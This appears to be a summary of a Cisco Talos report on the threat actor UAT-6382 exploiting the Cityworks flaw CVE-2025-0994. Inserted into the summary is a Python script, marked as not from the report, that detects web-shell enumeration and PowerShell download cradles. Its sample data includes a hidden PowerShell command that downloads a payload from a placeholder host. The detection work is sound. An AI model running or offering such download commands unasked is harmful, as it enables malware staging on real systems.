Cisco Talos Blog: UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware

Source URL: https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/
Source: Cisco Talos Blog
Title: UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware

Feedly Summary: Talos has observed exploitation of CVE-2025-0994 in the wild by UAT-6382, a Chinese-speaking threat actor, who then deployed malware payloads via TetraLoader.


**Summary:** The text describes in-the-wild exploitation of a critical remote-code-execution vulnerability (CVE-2025-0994) in Cityworks by a threat actor assessed to be Chinese-speaking, who used it to deploy web shells and follow-on malware. It highlights the malware families involved and the implications for infrastructure security, particularly within local government networks.

**Detailed Description:**
– **Vulnerability Overview:**
  – CVE-2025-0994 is a critical remote-code-execution vulnerability in Cityworks, an asset management system.
  – Cisco Talos, alongside advisories from CISA and Trimble, has identified exploitation of this vulnerability.

– **Threat Actor Profile:**
  – The attack group, dubbed UAT-6382, is assessed to be composed of Chinese-speaking actors.
  – Their tactics, techniques, and procedures (TTPs) include the rapid deployment of web shells and the use of Rust-based malware.

– **Technical Analysis:**
  – The attackers demonstrated advanced capabilities by deploying multiple web shells (e.g., AntSword, chinatso).
  – Notable tools include:
    – **TetraLoader:** A Rust-based loader that injects payloads into benign processes.
    – **Cobalt Strike Beacons:** Deployed to provide command and control (C2).
    – **VShell:** A Go-based implant used for remote access.

– **Intrusion Details:**
  – Initial reconnaissance led to the installation of backdoors and malware on compromised systems.
  – Notable commands used for enumeration and staging:
    – `cmd.exe` commands for directory listing and file operations.
    – PowerShell commands for malicious downloads from external servers.
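The enumeration and staging pattern summarized above (a web shell on the application server spawning `cmd.exe` for directory listings and PowerShell for downloads from external servers) is something defenders can look for in process-creation telemetry. The following is an added detection example, not code from the Talos post: it scans constructed process events for a command interpreter launched by a web server worker process and for PowerShell download cradles. The `w3wp.exe` parent (assumed for an IIS-hosted application), the field names and every sample event are assumptions constructed for the example.

```python
"""Heuristic detector for web-shell-driven enumeration and staging.

Added example, not from the Talos post. The parent process name, the event
field names and all sample events below are constructed assumptions.
"""
import re

# Web server worker processes that should not normally spawn shells
# (w3wp.exe is assumed for an IIS-hosted application).
WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Generic PowerShell download-cradle indicators (not taken from the page).
DOWNLOAD_VERBS = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile", re.I
)
URL = re.compile(r"https?://", re.I)

# cmd.exe directory listing / file operations, as described in the summary.
ENUM_OR_FILE_OP = re.compile(r"\b(dir|type|copy|move|del)\b", re.I)


def _basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(event):
    """Return a list of findings (empty if nothing suspicious) for one event.

    event: dict with keys id, parent_image, image, command_line.
    """
    findings = []
    parent = _basename(event["parent_image"])
    image = _basename(event["image"])
    cmdline = event["command_line"]

    # A shell spawned directly by the web worker is the classic web-shell signal.
    if parent in WEB_WORKERS and image in SHELLS:
        findings.append("web-worker-spawned-shell")
        if ENUM_OR_FILE_OP.search(cmdline):
            findings.append("enumeration-or-file-op-via-web-worker")

    # A PowerShell command line carrying both a download verb and a URL.
    if image in {"powershell.exe", "pwsh.exe"}:
        if DOWNLOAD_VERBS.search(cmdline) and URL.search(cmdline):
            findings.append("powershell-download")

    return findings


def scan(events):
    """Return {event_id: findings} for every event with at least one finding."""
    results = {}
    for event in events:
        findings = classify_event(event)
        if findings:
            results[event["id"]] = findings
    return results


# Constructed sample events; 203.0.113.10 is a documentation-range address.
SAMPLE_EVENTS = [
    {"id": 1,
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c dir C:\inetpub\wwwroot"},
    {"id": 2,
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -nop -w hidden -c "Invoke-WebRequest '
                     'http://203.0.113.10/stage.bin -OutFile C:\\Windows\\Temp\\s.bin"'},
    {"id": 3,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users"},
    {"id": 4,
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for event_id, findings in scan(SAMPLE_EVENTS).items():
        print(event_id, findings)
```

The parent-process check is the higher-confidence signal: an interactive user running PowerShell to list a directory (event 3) is not flagged, while the same interpreter launched by the web worker is. In a real deployment the worker process name and the download-verb list should be tuned to the application stack and to the organization's own administrative tooling.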

– **Indicators of Compromise (IOCs):**
  – Specific hashes for TetraLoader and Cobalt Strike beacons are provided.
  – Domain names and associated malicious URLs are listed, demonstrating the breadth of the attack infrastructure.

– **Mitigation Recommendations:**
  – Suggested mitigations include:
    – Deployment of Cisco Secure Endpoint and other Cisco security solutions.
    – Use of multi-factor authentication (Cisco Duo).
    – Continuous monitoring of network traffic (Cisco Secure Network/Cloud Analytics).

– **Conclusion:**
  – This campaign highlights the need for heightened vigilance and mature security controls to protect vulnerable infrastructure, specifically in public sector environments running utility and asset management systems.

**Key Implications for Security Professionals:**
– Organizations must stay updated on vulnerabilities and employ proactive security measures to defend against sophisticated threat actor tactics.
– Integrating detection and response capabilities inherent in advanced threat protection solutions is critical for mitigating potential risks associated with such targeted attacks.